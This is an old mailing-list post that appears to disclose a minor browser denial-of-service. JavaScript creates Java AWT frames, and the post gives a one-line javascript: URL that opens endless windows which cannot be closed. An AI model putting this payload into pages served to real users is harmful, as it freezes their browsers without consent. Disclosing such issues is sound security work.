From: Ian McKellar 
Subject: Java/JavaScript DoS

I was reading through my friendly `Webmaster in a Nutshell' O'Reilly book, and
I came across a reference to the creation of Java objects from JavaScript
i.e.:

_SCRIPT LANG=JavaScript_
var s=java.lang.System;
s.out.println("this is a test");

// or even

var r=new java.lang.String("this is a string");

_/SCRIPT_

This intreaged me, so my mind turned (as it does) to matters of security. One
think you can't do with these dynamically created Java objects is make any
outbound network connections, or successfully receive and incoming connections.

One concerning thing you can do is:

javascript:while(true) { (new java.awt.Frame("DoS!")).show(); }

This will very quickly open lots of windows you can't close.

I don't see these as serious issues, but something that we should be aware of.